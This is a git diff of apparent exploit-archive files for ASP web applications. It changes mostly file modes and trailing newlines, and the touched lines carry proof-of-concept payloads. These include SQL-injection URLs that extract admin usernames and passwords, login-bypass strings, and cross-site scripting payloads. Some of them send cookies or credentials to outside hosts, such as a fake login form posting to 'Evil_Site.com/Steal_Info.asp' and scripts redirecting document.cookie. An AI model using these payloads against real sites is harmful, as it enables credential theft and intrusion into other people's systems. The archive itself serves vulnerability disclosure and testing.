By Cr@zy_King</font></b></p> </tr></table></form></html> \ No newline at end of file diff --git a/platforms/asp/webapps/29596.txt b/platforms/asp/webapps/29596.txt old mode 100755 new mode 100644 index 37ceb8197..bd30fb505 --- a/platforms/asp/webapps/29596.txt +++ b/platforms/asp/webapps/29596.txt @@ -4,4 +4,4 @@ eWay is prone to a cross-site scripting vulnerability because the application fa An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://127.0.0.1/path/search?q=%22%3E%3Cscript%3Ealert%28%27bl4ck%27%29%3C%2Fscript%3E \ No newline at end of file +http://127.0.0.1/path/search?q=%22%3E%3Cscript%3Ealert%28%27bl4ck%27%29%3C%2Fscript%3E \ No newline at end of file diff --git a/platforms/asp/webapps/29597.txt b/platforms/asp/webapps/29597.txt old mode 100755 new mode 100644 index e12a324cb..b09d358b5 --- a/platforms/asp/webapps/29597.txt +++ b/platforms/asp/webapps/29597.txt @@ -4,4 +4,4 @@ Community Server is prone to a cross-site scripting vulnerability because the ap An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/path/search/SearchResults.aspx?q=%22%3e%3cscript%3ealert(%27bl4ck%27)%3c%2fscript%3e&o=Relevance \ No newline at end of file +http://www.example.com/path/search/SearchResults.aspx?q=%22%3e%3cscript%3ealert(%27bl4ck%27)%3c%2fscript%3e&o=Relevance \ No newline at end of file diff --git a/platforms/asp/webapps/29600.txt b/platforms/asp/webapps/29600.txt old mode 100755 new mode 100644 index 55951ea95..cba607045 --- a/platforms/asp/webapps/29600.txt +++ b/platforms/asp/webapps/29600.txt @@ -4,4 +4,4 @@ Fullaspsite Shop is prone to multiple input-validation issues, including multipl A successful exploit of these vulnerabilities could allow an attacker to compromise the application, access or modify data, steal cookie-based authentication credentials, or even exploit vulnerabilities in the underlying database implementation. Other attacks are also possible. -http://www.example.com/ScriptPath/listmain.asp?cat=<script>alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/ScriptPath/listmain.asp?cat=<script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/asp/webapps/29601.txt b/platforms/asp/webapps/29601.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29611.txt b/platforms/asp/webapps/29611.txt old mode 100755 new mode 100644 index e82d22498..30673668e --- a/platforms/asp/webapps/29611.txt +++ b/platforms/asp/webapps/29611.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Version 1.0 is vulnerable; other versions may also be affected. -http://www.example.com/h_goster.asp?id=1+union+select+0,MsEmail,MsUserName,MsPassword,4+from+uyeler \ No newline at end of file +http://www.example.com/h_goster.asp?id=1+union+select+0,MsEmail,MsUserName,MsPassword,4+from+uyeler \ No newline at end of file diff --git a/platforms/asp/webapps/2962.txt b/platforms/asp/webapps/2962.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29622.txt b/platforms/asp/webapps/29622.txt old mode 100755 new mode 100644 index 99b2bcfac..b10c6bc1f --- a/platforms/asp/webapps/29622.txt +++ b/platforms/asp/webapps/29622.txt @@ -8,4 +8,4 @@ Version 2.0 is vulnerable; other versions may also be affected. http://www.example.com/page.asp?art_id=[SQL] http://www.example.com/page.asp?art_id=-1+union+select+0,Name,2,3,4,5,6,7,8,9+from+Users+where+id=1 -http://www.example.com/page.asp?art_id=-1+union+select+0,PassWord,2,3,4,5,6,7,8,9+from+Users+where+id=1 \ No newline at end of file +http://www.example.com/page.asp?art_id=-1+union+select+0,PassWord,2,3,4,5,6,7,8,9+from+Users+where+id=1 \ No newline at end of file diff --git a/platforms/asp/webapps/2963.txt b/platforms/asp/webapps/2963.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29675.txt b/platforms/asp/webapps/29675.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29817.txt b/platforms/asp/webapps/29817.txt old mode 100755 new mode 100644 index ab3255478..a99cea56d --- a/platforms/asp/webapps/29817.txt +++ b/platforms/asp/webapps/29817.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc This issue affects Gazi Okul Sitesi 2007. -http://www.example.com//fotokategori.asp?'%20union%20select%201,2,3,password,5,6,username,8%20from%20admin \ No newline at end of file +http://www.example.com//fotokategori.asp?'%20union%20select%201,2,3,password,5,6,username,8%20from%20admin \ No newline at end of file diff --git a/platforms/asp/webapps/2986.txt b/platforms/asp/webapps/2986.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/2987.txt b/platforms/asp/webapps/2987.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/2989.txt b/platforms/asp/webapps/2989.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/2992.txt b/platforms/asp/webapps/2992.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29929.txt b/platforms/asp/webapps/29929.txt old mode 100755 new mode 100644 index 94af803e2..f6784ca5d --- a/platforms/asp/webapps/29929.txt +++ b/platforms/asp/webapps/29929.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Burak Yilmaz Blog 1.0 is vulnerable; other versions may also be affected. -http://www.example.com/[path]/bry.asp?islem=yazidevam&id=-1+union+select+0,0,0,0,0,0,sifre,0+from+admin \ No newline at end of file +http://www.example.com/[path]/bry.asp?islem=yazidevam&id=-1+union+select+0,0,0,0,0,0,sifre,0+from+admin \ No newline at end of file diff --git a/platforms/asp/webapps/2993.txt b/platforms/asp/webapps/2993.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29933.txt b/platforms/asp/webapps/29933.txt old mode 100755 new mode 100644 index 680840c24..eae02d505 --- a/platforms/asp/webapps/29933.txt +++ b/platforms/asp/webapps/29933.txt @@ -4,4 +4,4 @@ Gazi Download Portal is prone to an SQL-injection vulnerability because it fails Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation. -http://www.example.com/down_indir.asp?id=1+union+select+0,adminsifre,2,3,4,5,6,7+from+ayarlar \ No newline at end of file +http://www.example.com/down_indir.asp?id=1+union+select+0,adminsifre,2,3,4,5,6,7+from+ayarlar \ No newline at end of file diff --git a/platforms/asp/webapps/2994.htm b/platforms/asp/webapps/2994.htm old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/2995.htm b/platforms/asp/webapps/2995.htm old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/29958.txt b/platforms/asp/webapps/29958.txt old mode 100755 new mode 100644 index 81e1126d8..6f067319f --- a/platforms/asp/webapps/29958.txt +++ b/platforms/asp/webapps/29958.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc fipsCMS 2.1 and prior versions are vulnerable to this issue. -http://www.example.com/home/index.asp?pid='/**/union/**/select/**/0,username,password,3,4,5,6,7,8,9/**/from/**/pidRoot/**/ \ No newline at end of file +http://www.example.com/home/index.asp?pid='/**/union/**/select/**/0,username,password,3,4,5,6,7,8,9/**/from/**/pidRoot/**/ \ No newline at end of file diff --git a/platforms/asp/webapps/2996.htm b/platforms/asp/webapps/2996.htm old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/3001.txt b/platforms/asp/webapps/3001.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/30048.html b/platforms/asp/webapps/30048.html old mode 100755 new mode 100644 index 550c7899a..1f5ac13fc --- a/platforms/asp/webapps/30048.html +++ b/platforms/asp/webapps/30048.html @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow VP-ASP Shopping Cart 6.50 is vulnerable; other versions may also be affected. -<!-- VP-ASP Shopping Cart 6.50 - Cross-Site Scripting Vulnerability A cross-site scripting vulnerability in VP-ASP Shopping Cart 6.50 was discovered. The vendor, VP-ASP, shipped an official patch on May 16th, 2007. Vulnerable Variable: type Vulnerable File: shopcontent.asp Vulnerable: VP-ASP Shopping Cart 6.50 (other versions should also be vulnerable) Google d0rk: intitle:"VP-ASP Shopping Cart 6.50" John Martinelli john@martinelli.com RedLevel Security http://www.RedLevel.org May 16th, 2007 !--> <html> <head><title>VP-ASP Shopping Cart 6.50 - Cross-Site Scripting Vulnerability</title><body> <center><br><br> <font size=4>VP-ASP Shopping Cart 6.50 - Cross-Site Scripting Vulnerability</font><br> <font size=3>discovered by <a href="http://john-martinelli.com">John Martinelli</a> of <a href="http://redlevel.org">RedLevel Security</a><br><br> Google d0rk: <a href="http://www.google.com/search?q=intitle%3A%22VP-ASP+Shopping+Cart+6.50%22">intitle:"VP-ASP Shopping Cart 6.50"</a> </font><br><br><br> <center>file <b>shopcontent.asp</b> - variable <b>type</b> - method <b>get</b></center><br> <form action="http://www.example.com/shop/shopcontent.asp" method="get"> <input size=75 name="type" value="<body onload=alert(1)>"> <input type=submit value="Execute XSS Attack" class="button"> </form> <br><br><br> </form> </body></html> \ No newline at end of file +<!-- VP-ASP Shopping Cart 6.50 - Cross-Site Scripting Vulnerability A cross-site scripting vulnerability in VP-ASP Shopping Cart 6.50 was discovered. The vendor, VP-ASP, shipped an official patch on May 16th, 2007. Vulnerable Variable: type Vulnerable File: shopcontent.asp Vulnerable: VP-ASP Shopping Cart 6.50 (other versions should also be vulnerable) Google d0rk: intitle:"VP-ASP Shopping Cart 6.50" John Martinelli john@martinelli.com RedLevel Security http://www.RedLevel.org May 16th, 2007 !--> <html> <head><title>VP-ASP Shopping Cart 6.50 - Cross-Site Scripting Vulnerability</title><body> <center><br><br> <font size=4>VP-ASP Shopping Cart 6.50 - Cross-Site Scripting Vulnerability</font><br> <font size=3>discovered by <a href="http://john-martinelli.com">John Martinelli</a> of <a href="http://redlevel.org">RedLevel Security</a><br><br> Google d0rk: <a href="http://www.google.com/search?q=intitle%3A%22VP-ASP+Shopping+Cart+6.50%22">intitle:"VP-ASP Shopping Cart 6.50"</a> </font><br><br><br> <center>file <b>shopcontent.asp</b> - variable <b>type</b> - method <b>get</b></center><br> <form action="http://www.example.com/shop/shopcontent.asp" method="get"> <input size=75 name="type" value="<body onload=alert(1)>"> <input type=submit value="Execute XSS Attack" class="button"> </form> <br><br><br> </form> </body></html> \ No newline at end of file diff --git a/platforms/asp/webapps/30077.txt b/platforms/asp/webapps/30077.txt old mode 100755 new mode 100644 index 7ab7bc5af..9eeeeea63 --- a/platforms/asp/webapps/30077.txt +++ b/platforms/asp/webapps/30077.txt @@ -6,4 +6,4 @@ Exploiting this vulnerability could allow an attacker to perform cross-site scri Cisco CallManager 4.1.1 is reported vulnerable; other versions may also be affected. -https://www.example.com/CCMAdmin/serverlist.asp?findBy=servername&match=begins&pattern=[xss] \ No newline at end of file +https://www.example.com/CCMAdmin/serverlist.asp?findBy=servername&match=begins&pattern=[xss] \ No newline at end of file diff --git a/platforms/asp/webapps/30141.txt b/platforms/asp/webapps/30141.txt old mode 100755 new mode 100644 index c95211919..62ec55bcf --- a/platforms/asp/webapps/30141.txt +++ b/platforms/asp/webapps/30141.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue by manipulating the SQL query logic to carry Hünkaray Okul Portalý 1.1 is vulnerable to this issue. -http://www.example.com/okul/haberoku.asp?id=11%20union+select+0,sifre,kullaniciadi,3,4+from+admin \ No newline at end of file +http://www.example.com/okul/haberoku.asp?id=11%20union+select+0,sifre,kullaniciadi,3,4+from+admin \ No newline at end of file diff --git a/platforms/asp/webapps/30159.txt b/platforms/asp/webapps/30159.txt old mode 100755 new mode 100644 index de165b54c..1c7eb1a0f --- a/platforms/asp/webapps/30159.txt +++ b/platforms/asp/webapps/30159.txt @@ -4,4 +4,4 @@ ASP Folder Gallery is prone to an arbitrary-file-download vulnerability because An attacker can exploit this issue to download arbitrary files within the context of the affected webserver. -http://www.example.com/aspfoldergallery/download_script.asp?file=viewimage.asp \ No newline at end of file +http://www.example.com/aspfoldergallery/download_script.asp?file=viewimage.asp \ No newline at end of file diff --git a/platforms/asp/webapps/30165.txt b/platforms/asp/webapps/30165.txt old mode 100755 new mode 100644 index 430c3928a..fca313069 --- a/platforms/asp/webapps/30165.txt +++ b/platforms/asp/webapps/30165.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue by manipulating the SQL query logic to carry Ibrahim Ã?AKICI Okul Portal 2.0 is vulnerable to this issue. -http://www.example.com/haber_oku.asp?id=9%20union+select+0,sifre,kulladi,3,4,5,6+from+uyeler \ No newline at end of file +http://www.example.com/haber_oku.asp?id=9%20union+select+0,sifre,kulladi,3,4,5,6+from+uyeler \ No newline at end of file diff --git a/platforms/asp/webapps/30198.txt b/platforms/asp/webapps/30198.txt old mode 100755 new mode 100644 index 9563c479e..567ee2340 --- a/platforms/asp/webapps/30198.txt +++ b/platforms/asp/webapps/30198.txt @@ -4,4 +4,4 @@ TDizin is prone to a cross-site scripting vulnerability because it fails to prop Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/TDizin/arama.asp?ara= "><script>alert("G3");</script>&submit=+T%27ARA+ \ No newline at end of file +http://www.example.com/TDizin/arama.asp?ara= "><script>alert("G3");</script>&submit=+T%27ARA+ \ No newline at end of file diff --git a/platforms/asp/webapps/30203.txt b/platforms/asp/webapps/30203.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/30204.txt b/platforms/asp/webapps/30204.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/30205.txt b/platforms/asp/webapps/30205.txt old mode 100755 new mode 100644 index 7f04e1fd4..dd0143493 --- a/platforms/asp/webapps/30205.txt +++ b/platforms/asp/webapps/30205.txt @@ -8,4 +8,4 @@ The attacker may also leverage this issue to execute arbitrary code in the brows Comersus Cart 7.0.7 is vulnerable; other versions may also be affected. -http://www.example.com/path/store/comersus_message.asp?message=<script src=http://www.Site.com/Evil_Script.js></script> http://www.example.com/path/store/comersus_message.asp?message=<form%20action="http://www.Evil_Site.com/Steal_Info.asp"%20method="post">Username:<input%20name="username"%20type="text"%20maxlength="10"><br>Password:<input%20name="password"%2 0type="text"%20maxlength="10"><br><input%20name="login"%20type="submit"%20value ="Login"></form> \ No newline at end of file +http://www.example.com/path/store/comersus_message.asp?message=<script src=http://www.Site.com/Evil_Script.js></script> http://www.example.com/path/store/comersus_message.asp?message=<form%20action="http://www.Evil_Site.com/Steal_Info.asp"%20method="post">Username:<input%20name="username"%20type="text"%20maxlength="10"><br>Password:<input%20name="password"%2 0type="text"%20maxlength="10"><br><input%20name="login"%20type="submit"%20value ="Login"></form> \ No newline at end of file diff --git a/platforms/asp/webapps/30207.txt b/platforms/asp/webapps/30207.txt old mode 100755 new mode 100644 index d99c58c6d..1fc2538c4 --- a/platforms/asp/webapps/30207.txt +++ b/platforms/asp/webapps/30207.txt @@ -4,4 +4,4 @@ FuseTalk is prone to multiple cross-site scripting vulnerabilities because the a An attacker can exploit these issues to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/blog/include/common/comfinish.cfm?FTRESULT.errorcode=0&FTVAR_SCRIPTRUN=[xss] \ No newline at end of file +http://www.example.com/blog/include/common/comfinish.cfm?FTRESULT.errorcode=0&FTVAR_SCRIPTRUN=[xss] \ No newline at end of file diff --git a/platforms/asp/webapps/30250.txt b/platforms/asp/webapps/30250.txt old mode 100755 new mode 100644 index 8f6e5d31b..613f5ca3c --- a/platforms/asp/webapps/30250.txt +++ b/platforms/asp/webapps/30250.txt @@ -4,4 +4,4 @@ DUClassmate is prone to an SQL-injection vulnerability because the application f A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/default.asp?iCity=[SQL Injection] \ No newline at end of file +http://www.example.com/default.asp?iCity=[SQL Injection] \ No newline at end of file diff --git a/platforms/asp/webapps/30282.txt b/platforms/asp/webapps/30282.txt old mode 100755 new mode 100644 index 9f6558ec8..4d910bf9c --- a/platforms/asp/webapps/30282.txt +++ b/platforms/asp/webapps/30282.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue by manipulating the SQL query logic to carry This issue affects Levent Veysi Portal 1.0; other versions may also be affected. -http://www.example.com/script_path/oku.asp?id=-1+union+select+0,1,kullaniciadi,sifre+from+admin \ No newline at end of file +http://www.example.com/script_path/oku.asp?id=-1+union+select+0,1,kullaniciadi,sifre+from+admin \ No newline at end of file diff --git a/platforms/asp/webapps/30289.txt b/platforms/asp/webapps/30289.txt old mode 100755 new mode 100644 index a2b28718e..c525e4796 --- a/platforms/asp/webapps/30289.txt +++ b/platforms/asp/webapps/30289.txt @@ -6,4 +6,4 @@ A successful exploit could allow an attacker to compromise the application, acce All versions are considered vulnerable to this issue. -http://www.example.com/default.asp?action=article&ID=-1+or+1=(SELECT+TOP+1+username+from+users)-- \ No newline at end of file +http://www.example.com/default.asp?action=article&ID=-1+or+1=(SELECT+TOP+1+username+from+users)-- \ No newline at end of file diff --git a/platforms/asp/webapps/30296.txt b/platforms/asp/webapps/30296.txt old mode 100755 new mode 100644 index 320b4cb05..8596e1a6a --- a/platforms/asp/webapps/30296.txt +++ b/platforms/asp/webapps/30296.txt @@ -6,4 +6,4 @@ A successful exploit could allow an attacker to compromise the application, acce Reports indicate that contentserver versions prior to 5.6.2964 are vulnerable to this issue. -https://www.example.com/admin/picture/picture_real_edit.asp?id='%20union%20select%20@@version%20,@@microsoftversion,@@version-- \ No newline at end of file +https://www.example.com/admin/picture/picture_real_edit.asp?id='%20union%20select%20@@version%20,@@microsoftversion,@@version-- \ No newline at end of file diff --git a/platforms/asp/webapps/30297.txt b/platforms/asp/webapps/30297.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/30298.txt b/platforms/asp/webapps/30298.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/30300.txt b/platforms/asp/webapps/30300.txt old mode 100755 new mode 100644 index 05fce228f..3281c2aed --- a/platforms/asp/webapps/30300.txt +++ b/platforms/asp/webapps/30300.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc http://www.example.com/script_path/katgoster.asp?katID=-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin -http://www.example.com/script_path/katgoster.asp?katID=-1+union+select+0,sifre,2,3,4,5,6,7+from+admin \ No newline at end of file +http://www.example.com/script_path/katgoster.asp?katID=-1+union+select+0,sifre,2,3,4,5,6,7+from+admin \ No newline at end of file diff --git a/platforms/asp/webapps/3031.txt b/platforms/asp/webapps/3031.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/30313.txt b/platforms/asp/webapps/30313.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/30316.txt b/platforms/asp/webapps/30316.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/3032.txt b/platforms/asp/webapps/3032.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/30327.html b/platforms/asp/webapps/30327.html old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/30328.txt b/platforms/asp/webapps/30328.txt old mode 100755 new mode 100644 index 490547d9f..0c82704a8 --- a/platforms/asp/webapps/30328.txt +++ b/platforms/asp/webapps/30328.txt @@ -5,4 +5,4 @@ Alisveris Sitesi Scripti is prone to multiple SQL-injection vulnerabilities beca Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/?menukat=2%20&mod=product&cat_id=7&product_id=[SQL] -http://www.example.com/?menukat=2%20&mod=product&cat_id=[SQL] \ No newline at end of file +http://www.example.com/?menukat=2%20&mod=product&cat_id=[SQL] \ No newline at end of file diff --git a/platforms/asp/webapps/30330.txt b/platforms/asp/webapps/30330.txt old mode 100755 new mode 100644 index 4aad9bfa4..22ac6b97a --- a/platforms/asp/webapps/30330.txt +++ b/platforms/asp/webapps/30330.txt @@ -4,4 +4,4 @@ Alisveris Sitesi Scripti is prone to a cross-site scripting vulnerability becaus An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/path/?mod=search&type=simple&q=[XSS] \ No newline at end of file +http://www.example.com/path/?mod=search&type=simple&q=[XSS] \ No newline at end of file diff --git a/platforms/asp/webapps/30331.html b/platforms/asp/webapps/30331.html old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/30332.txt b/platforms/asp/webapps/30332.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/3035.txt b/platforms/asp/webapps/3035.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/30382.txt b/platforms/asp/webapps/30382.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/30402.txt b/platforms/asp/webapps/30402.txt old mode 100755 new mode 100644 index 2a153a8be..a050ad484 --- a/platforms/asp/webapps/30402.txt +++ b/platforms/asp/webapps/30402.txt @@ -4,4 +4,4 @@ Nukedit is prone to a cross-site scripting vulnerability because the application An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/utilities/login.asp?email=%22%3C/textarea%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E \ No newline at end of file +http://www.example.com/utilities/login.asp?email=%22%3C/textarea%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E \ No newline at end of file diff --git a/platforms/asp/webapps/30423.txt b/platforms/asp/webapps/30423.txt old mode 100755 new mode 100644 index c0934b13f..1bc6f12ff --- a/platforms/asp/webapps/30423.txt +++ b/platforms/asp/webapps/30423.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Metyus Forum Portal 1.0 is vulnerable; other versions may also be affected. -http://www.example.com/philboard_forum.asp?forumid=-99+union+all+select+0,1,2%20,3,4,5,6,7,8,9,password,username,12,13,14,15,16,17,18,19,20+%20from+users \ No newline at end of file +http://www.example.com/philboard_forum.asp?forumid=-99+union+all+select+0,1,2%20,3,4,5,6,7,8,9,password,username,12,13,14,15,16,17,18,19,20+%20from+users \ No newline at end of file diff --git a/platforms/asp/webapps/30424.txt b/platforms/asp/webapps/30424.txt old mode 100755 new mode 100644 index 49f7a2ccc..f3ab071f9 --- a/platforms/asp/webapps/30424.txt +++ b/platforms/asp/webapps/30424.txt @@ -8,4 +8,4 @@ Berthanas Ziyaretci Defteri 2.0 is affected; other versions may also be vulnerab To demonstrate this issue, use the following string for both the username and password of the vulnerable script: -' OR '1'='1 \ No newline at end of file +' OR '1'='1 \ No newline at end of file diff --git a/platforms/asp/webapps/30425.txt b/platforms/asp/webapps/30425.txt old mode 100755 new mode 100644 index 5dec27cb3..9dfa86378 --- a/platforms/asp/webapps/30425.txt +++ b/platforms/asp/webapps/30425.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc To demonstrate this issue, use a valid username, such as 'admin', in the Username field, and the following string for the password field of the vulnerable script: -anything' OR 'x'='x \ No newline at end of file +anything' OR 'x'='x \ No newline at end of file diff --git a/platforms/asp/webapps/30426.txt b/platforms/asp/webapps/30426.txt old mode 100755 new mode 100644 index fb8b3d0d8..a739797f2 --- a/platforms/asp/webapps/30426.txt +++ b/platforms/asp/webapps/30426.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc To demonstrate this issue, use a valid username, such as 'admin', in the Username field, and the following string for the password field of the vulnerable script: -anything' OR 'x'='x \ No newline at end of file +anything' OR 'x'='x \ No newline at end of file diff --git a/platforms/asp/webapps/30427.txt b/platforms/asp/webapps/30427.txt old mode 100755 new mode 100644 index 893f9afa3..ff1033475 --- a/platforms/asp/webapps/30427.txt +++ b/platforms/asp/webapps/30427.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc To demonstrate this issue, use a valid username, such as 'admin', in the Username field, and the following string for the password field of the vulnerable script: -anything' OR 'x'='x \ No newline at end of file +anything' OR 'x'='x \ No newline at end of file diff --git a/platforms/asp/webapps/30428.txt b/platforms/asp/webapps/30428.txt old mode 100755 new mode 100644 index fdeeaadf9..e8c9f1fd0 --- a/platforms/asp/webapps/30428.txt +++ b/platforms/asp/webapps/30428.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc To demonstrate this issue, use a valid username, such as 'admin', in the Username field, and the following string for the password field of the vulnerable script: -anything' OR 'x'='x \ No newline at end of file +anything' OR 'x'='x \ No newline at end of file diff --git a/platforms/asp/webapps/30446.txt b/platforms/asp/webapps/30446.txt old mode 100755 new mode 100644 index 8399ed56a..9b5cf4186 --- a/platforms/asp/webapps/30446.txt +++ b/platforms/asp/webapps/30446.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Hunkaray Okul Portali 1.1 is vulnerable; other versions may also be affected. -http://www.example.com/script_path/duyuruoku.asp?id=1+union+select+0,1,sifre,3+from+admin \ No newline at end of file +http://www.example.com/script_path/duyuruoku.asp?id=1+union+select+0,1,sifre,3+from+admin \ No newline at end of file diff --git a/platforms/asp/webapps/30451.txt b/platforms/asp/webapps/30451.txt old mode 100755 new mode 100644 index ef790a1cd..bb7d14b92 --- a/platforms/asp/webapps/30451.txt +++ b/platforms/asp/webapps/30451.txt @@ -4,4 +4,4 @@ Next Gen Portfolio Manager is prone to multiple SQL-injection vulnerabilities be Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/default.asp?ExecuteTheLogin=1&Users_Email=anything%27+OR+%27x%27%3D%27x&Users_Password=anything%27+OR+%27x%27%3D%27x \ No newline at end of file +http://www.example.com/default.asp?ExecuteTheLogin=1&Users_Email=anything%27+OR+%27x%27%3D%27x&Users_Password=anything%27+OR+%27x%27%3D%27x \ No newline at end of file diff --git a/platforms/asp/webapps/3046.txt b/platforms/asp/webapps/3046.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/30505.txt b/platforms/asp/webapps/30505.txt old mode 100755 new mode 100644 index fa396051f..6f205a8e5 --- a/platforms/asp/webapps/30505.txt +++ b/platforms/asp/webapps/30505.txt @@ -4,4 +4,4 @@ Text File Search Classic is prone to a cross-site scripting vulnerability becaus An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/samples/textfilesearch.asp?query=[xss] \ No newline at end of file +http://www.example.com/samples/textfilesearch.asp?query=[xss] \ No newline at end of file diff --git a/platforms/asp/webapps/30541.txt b/platforms/asp/webapps/30541.txt old mode 100755 new mode 100644 index 30cccbbd4..2e0fc136e --- a/platforms/asp/webapps/30541.txt +++ b/platforms/asp/webapps/30541.txt @@ -20,4 +20,4 @@ https://www.example.com/CCMUser/logon.asp?lang=en'+union+select+top+1+convert(ch To display the destination number for that call. Replace "1174900000" with the value from the previous query: -https://www.example.com/CCMUser/logon.asp?lang=en'+union+select+top+1+finalCalledPartyNumber+from+cdr..CallDetailRecord+where+callingPartyNumber='12345'+and+dateTimeOrigination=1174900000;select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''=' \ No newline at end of file +https://www.example.com/CCMUser/logon.asp?lang=en'+union+select+top+1+finalCalledPartyNumber+from+cdr..CallDetailRecord+where+callingPartyNumber='12345'+and+dateTimeOrigination=1174900000;select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''=' \ No newline at end of file diff --git a/platforms/asp/webapps/30545.txt b/platforms/asp/webapps/30545.txt old mode 100755 new mode 100644 index 20a995cf5..41af2b604 --- a/platforms/asp/webapps/30545.txt +++ b/platforms/asp/webapps/30545.txt @@ -6,4 +6,4 @@ Exploiting this vulnerability may allow an attacker to perform cross-site script This issue affects Absolute Poll Manager XE 4.1; other versions may also be vulnerable. -http://www.example.com/AbsolutePollManager/xlaapmview.asp?p=1&msg=<script>alert("running+code+within+the+context+of+"%2bdocument.domain)</script> http://www.example.com/AbsolutePollManager/xlaapmview.asp?p=1&msg=<script>location="http://www.example2.com/?"%2bdocument.cookie</script> http://www.example.com/AbsolutePollManager/xlaapmview.asp?p=1&msg=%3cscript%3elocation=%22http%3a//www.%65xample%2ecom/?%22%2bdocument.cookie%3c/script%3e& \ No newline at end of file +http://www.example.com/AbsolutePollManager/xlaapmview.asp?p=1&msg=<script>alert("running+code+within+the+context+of+"%2bdocument.domain)</script> http://www.example.com/AbsolutePollManager/xlaapmview.asp?p=1&msg=<script>location="http://www.example2.com/?"%2bdocument.cookie</script> http://www.example.com/AbsolutePollManager/xlaapmview.asp?p=1&msg=%3cscript%3elocation=%22http%3a//www.%65xample%2ecom/?%22%2bdocument.cookie%3c/script%3e& \ No newline at end of file diff --git a/platforms/asp/webapps/30564.txt b/platforms/asp/webapps/30564.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/30571.txt b/platforms/asp/webapps/30571.txt old mode 100755 new mode 100644 index de48cf94b..7f4899e7e --- a/platforms/asp/webapps/30571.txt +++ b/platforms/asp/webapps/30571.txt @@ -7,4 +7,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc This issue affects Proxy Anket 3.0.1; other versions may also be vulnerable. http://www.example.com/anketv3/anket.asp?islem=oyla&id=1+union+select+0,1,username,3+from+admin -http://www.example.com/anketv3/anket.asp?islem=oyla&id=1+union+select+0,1,password,3+from+admin \ No newline at end of file +http://www.example.com/anketv3/anket.asp?islem=oyla&id=1+union+select+0,1,password,3+from+admin \ No newline at end of file diff --git a/platforms/asp/webapps/3060.txt b/platforms/asp/webapps/3060.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/3061.txt b/platforms/asp/webapps/3061.txt old 